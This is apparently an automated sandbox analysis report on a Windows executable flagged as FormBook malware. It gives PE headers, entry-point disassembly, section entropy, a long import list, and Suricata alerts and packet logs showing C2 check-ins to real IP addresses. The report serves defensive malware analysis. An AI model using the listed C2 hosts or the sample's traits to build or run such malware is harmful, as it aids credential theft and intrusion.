                                                                  TLSH:C045CF22B3DDC361CB669173BF29B7016EBF7C614630B85B2F880D7DA950162162DB63
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                  File Icon

                                                                  Icon Hash:aaf3e3e3938382a0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x427dcd
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x674FA339 [Wed Dec 4 00:32:57 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F2050F0DCEAh
                                                                  jmp 00007F2050F00AB4h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [esp+10h]
                                                                  mov ecx, dword ptr [esp+14h]
                                                                  mov edi, dword ptr [esp+0Ch]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F2050F00C3Ah
                                                                  cmp edi, eax
                                                                  jc 00007F2050F00F9Eh
                                                                  bt dword ptr [004C31FCh], 01h
                                                                  jnc 00007F2050F00C39h
                                                                  rep movsb
                                                                  jmp 00007F2050F00F4Ch
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F2050F00E04h
                                                                  mov eax, edi
                                                                  xor eax, esi
                                                                  test eax, 0000000Fh
                                                                  jne 00007F2050F00C40h
                                                                  bt dword ptr [004BE324h], 01h
                                                                  jc 00007F2050F01110h
                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                  jnc 00007F2050F00DDDh
                                                                  test edi, 00000003h
                                                                  jne 00007F2050F00DEEh
                                                                  test esi, 00000003h
                                                                  jne 00007F2050F00DCDh
                                                                  bt edi, 02h
                                                                  jnc 00007F2050F00C3Fh
                                                                  mov eax, dword ptr [esi]
                                                                  sub ecx, 04h
                                                                  lea esi, dword ptr [esi+04h]
                                                                  mov dword ptr [edi], eax
                                                                  lea edi, dword ptr [edi+04h]
                                                                  bt edi, 03h
                                                                  jnc 00007F2050F00C43h
                                                                  movq xmm1, qword ptr [esi]
                                                                  sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007F2050F00C95h
                                                                  bt esi, 03h
                                                                  jnc 00007F2050F00CE8h

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ASM] VS2013 build 21005
                                                                  • [ C ] VS2013 build 21005
                                                                  • [C++] VS2013 build 21005
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                  • [RES] VS2013 build 21005
                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5f9b0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x711c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xc70000x5f9b00x5fa00082f47433536359b9185e7907e9eba22False0.9314185049019608data7.901867117227564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1270000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                  RT_RCDATA0xcf7b80x56c77data1.000326349638624
                                                                  RT_GROUP_ICON0x1264300x76dataEnglishGreat Britain0.6610169491525424
                                                                  RT_GROUP_ICON0x1264a80x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0x1264bc0x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0x1264d00x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0x1264e40xdcdataEnglishGreat Britain0.6181818181818182
                                                                  RT_MANIFEST0x1265c00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                  Imports

                                                                  DLLImport
                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                  UxTheme.dllIsThemeActive
                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-04T12:49:34.577709+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736161.97.168.24580TCP
                                                                  2024-12-04T12:49:34.577709+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449736161.97.168.24580TCP
                                                                  2024-12-04T12:49:52.219235+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973727.124.4.24680TCP
                                                                  2024-12-04T12:49:54.844256+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973827.124.4.24680TCP
                                                                  2024-12-04T12:49:57.500488+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973927.124.4.24680TCP
                                                                  2024-12-04T12:50:00.156746+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974227.124.4.24680TCP
                                                                  2024-12-04T12:50:00.156746+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974227.124.4.24680TCP
                                                                  2024-12-04T12:50:08.322933+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449763149.88.81.19080TCP
                                                                  2024-12-04T12:50:11.000584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449769149.88.81.19080TCP
                                                                  2024-12-04T12:50:13.656916+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449775149.88.81.19080TCP
                                                                  2024-12-04T12:50:16.312001+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449784149.88.81.19080TCP
                                                                  2024-12-04T12:50:16.312001+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449784149.88.81.19080TCP
                                                                  2024-12-04T12:50:24.063375+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980285.159.66.9380TCP
                                                                  2024-12-04T12:50:26.722193+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980885.159.66.9380TCP
                                                                  2024-12-04T12:50:29.394194+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44981685.159.66.9380TCP
                                                                  2024-12-04T12:50:31.856451+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44982585.159.66.9380TCP
                                                                  2024-12-04T12:50:31.856451+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44982585.159.66.9380TCP
                                                                  2024-12-04T12:50:38.879151+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449841185.27.134.14480TCP
                                                                  2024-12-04T12:50:41.691760+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449847185.27.134.14480TCP
                                                                  2024-12-04T12:50:44.412120+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449853185.27.134.14480TCP
                                                                  2024-12-04T12:50:47.033657+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449862185.27.134.14480TCP
                                                                  2024-12-04T12:50:47.033657+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449862185.27.134.14480TCP
                                                                  2024-12-04T12:50:54.031935+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449879104.21.95.16080TCP
                                                                  2024-12-04T12:50:56.413445+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449885104.21.95.16080TCP
                                                                  2024-12-04T12:50:59.102269+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449891104.21.95.16080TCP
                                                                  2024-12-04T12:51:02.253784+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449897104.21.95.16080TCP
                                                                  2024-12-04T12:51:02.253784+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449897104.21.95.16080TCP
                                                                  2024-12-04T12:51:09.203109+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449916104.21.57.24880TCP
                                                                  2024-12-04T12:51:11.872200+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449924104.21.57.24880TCP
                                                                  2024-12-04T12:51:14.514792+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449930104.21.57.24880TCP
                                                                  2024-12-04T12:51:17.199008+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449935104.21.57.24880TCP
                                                                  2024-12-04T12:51:17.199008+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449935104.21.57.24880TCP
                                                                  2024-12-04T12:51:24.517114+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449953154.88.22.10180TCP
                                                                  2024-12-04T12:51:27.188206+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449960154.88.22.10180TCP
                                                                  2024-12-04T12:51:29.875736+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449967154.88.22.10180TCP
                                                                  2024-12-04T12:51:32.537230+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449973154.88.22.10180TCP
                                                                  2024-12-04T12:51:32.537230+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449973154.88.22.10180TCP
                                                                  2024-12-04T12:51:39.434909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449989209.74.77.10780TCP
                                                                  2024-12-04T12:51:42.097305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449998209.74.77.10780TCP
                                                                  2024-12-04T12:51:44.812562+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450005209.74.77.10780TCP
                                                                  2024-12-04T12:51:47.416118+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450012209.74.77.10780TCP
                                                                  2024-12-04T12:51:47.416118+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450012209.74.77.10780TCP
                                                                  2024-12-04T12:52:06.692831+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037104.21.34.10380TCP
                                                                  2024-12-04T12:52:09.364227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038104.21.34.10380TCP
                                                                  2024-12-04T12:52:12.089088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450039104.21.34.10380TCP
                                                                  2024-12-04T12:52:14.720776+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450040104.21.34.10380TCP
                                                                  2024-12-04T12:52:14.720776+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450040104.21.34.10380TCP
                                                                  2024-12-04T12:52:24.157273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004120.2.249.780TCP
                                                                  2024-12-04T12:52:26.816512+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004220.2.249.780TCP
                                                                  2024-12-04T12:52:29.518405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004320.2.249.780TCP
                                                                  2024-12-04T12:52:32.225834+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45004420.2.249.780TCP
                                                                  2024-12-04T12:52:32.225834+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004420.2.249.780TCP
                                                                  2024-12-04T12:52:39.414424+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045156.251.17.22480TCP
                                                                  2024-12-04T12:52:42.082861+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450046156.251.17.22480TCP
                                                                  2024-12-04T12:52:44.766522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450047156.251.17.22480TCP
                                                                  2024-12-04T12:52:47.426257+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450048156.251.17.22480TCP
                                                                  2024-12-04T12:52:47.426257+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450048156.251.17.22480TCP
                                                                  2024-12-04T12:52:54.298723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004947.254.140.25580TCP
                                                                  2024-12-04T12:52:56.964994+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005047.254.140.25580TCP
                                                                  2024-12-04T12:52:59.716476+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005147.254.140.25580TCP
                                                                  2024-12-04T12:53:02.438178+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45005247.254.140.25580TCP
                                                                  2024-12-04T12:53:02.438178+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005247.254.140.25580TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 4, 2024 12:49:33.164457083 CET4973680192.168.2.4161.97.168.245
                                                                  Dec 4, 2024 12:49:33.284590006 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:33.286181927 CET4973680192.168.2.4161.97.168.245
                                                                  Dec 4, 2024 12:49:33.295788050 CET4973680192.168.2.4161.97.168.245
                                                                  Dec 4, 2024 12:49:33.416310072 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:34.577518940 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:34.577559948 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:34.577574968 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:34.577708960 CET4973680192.168.2.4161.97.168.245
                                                                  Dec 4, 2024 12:49:34.577939987 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:34.578118086 CET4973680192.168.2.4161.97.168.245
                                                                  Dec 4, 2024 12:49:34.582446098 CET4973680192.168.2.4161.97.168.245
                                                                  Dec 4, 2024 12:49:34.702342987 CET8049736161.97.168.245192.168.2.4
                                                                  Dec 4, 2024 12:49:50.660269022 CET4973780192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:50.780364037 CET804973727.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:50.781281948 CET4973780192.168.2.427.124.4.246
